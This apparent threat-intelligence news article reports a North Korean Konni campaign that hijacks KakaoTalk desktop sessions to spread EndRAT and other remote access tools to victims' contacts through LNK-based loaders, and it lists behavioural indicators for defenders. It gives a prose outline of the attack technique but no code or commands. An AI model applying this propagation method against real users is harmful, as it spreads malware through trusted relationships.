Konni APT Hijacks KakaoTalk to Spread EndRAT Across Contacts

North Korean threat group Konni is abusing the KakaoTalk desktop client to spread malware through victims' trusted contacts, according to new research from South Korean threat intelligence firm Genians. The campaign marks a shift in tactics—rather than relying solely on initial phishing success, the attackers are leveraging compromised social graphs for lateral movement.

The operation begins with spear-phishing emails disguised as invitations to serve as North Korean human rights lecturers. Once a victim's machine is compromised, Konni hijacks their KakaoTalk session to send malicious archives to selected contacts, transforming each victim into an unwitting distribution node.

How the Attack Chain Works

Initial access comes through a ZIP attachment containing a Windows shortcut (LNK) file. When executed, the LNK downloads a payload from an external server and establishes persistence via scheduled tasks. A decoy PDF opens simultaneously to distract the victim while installation completes.

The campaign deploys three separate remote access tools in AutoIt-based wrappers disguised as document files:

1. EndRAT - A relatively simple RAT providing file management, remote shell access, data transfer, and persistence capabilities
2. RftRAT - Used for additional command-and-control functionality
3. RemcosRAT - A commercially available RAT frequently abused by threat actors

What sets this campaign apart is what happens after initial compromise. The attackers access the victim's KakaoTalk desktop client—South Korea's dominant messaging platform with roughly 53 million monthly users—and selectively message contacts from the victim's friend list. These messages contain additional malicious archives with the same LNK-based loader, creating a worm-like propagation mechanism through trusted relationships.

Attribution and Infrastructure

Genians attributes this activity to Konni, a group that overlaps with other North Korea-linked operations including Kimsuky and APT37. The group has historically focused on South Korean government and diplomatic targets, though recent campaigns have expanded to blockchain developers and cryptocurrency projects, as we previously covered.

Command-and-control servers for this operation trace to Finland, Japan, and the Netherlands—a deliberate effort to distribute infrastructure across multiple jurisdictions and complicate takedown efforts.

Why This Matters

The KakaoTalk abuse represents an evolution in social engineering. Rather than crafting convincing phishing emails for each target, Konni can now reach new victims through messages from accounts they already trust. A file sent by a colleague or acquaintance faces far less scrutiny than one from an unknown sender.

This technique also provides built-in context. If a victim works in human rights or academic circles—Konni's traditional target set—their contacts likely share similar interests. The attackers can reuse the same lures without modification because the social graph does the targeting for them.

Organizations with exposure to South Korean operations should consider implementing phishing awareness training that explicitly addresses compromised trusted contacts. Standard advice about suspicious senders doesn't apply when the sender is someone the recipient knows and regularly communicates with.

Indicators to Watch

The campaign uses scheduled tasks for persistence and reaches out to hardcoded C2 infrastructure. Security teams should monitor for:

• Unusual KakaoTalk desktop client behavior, particularly automated messaging
• LNK files triggering PowerShell or cmd.exe execution
• AutoIt-compiled executables disguising themselves as documents
• Outbound connections to previously unseen infrastructure in Finland, Japan, or the Netherlands

The attackers' willingness to burn compromised accounts for distribution suggests they prioritize scale over stealth in later attack stages. Rapid detection of anomalous messaging patterns could disrupt the propagation chain before it spreads further.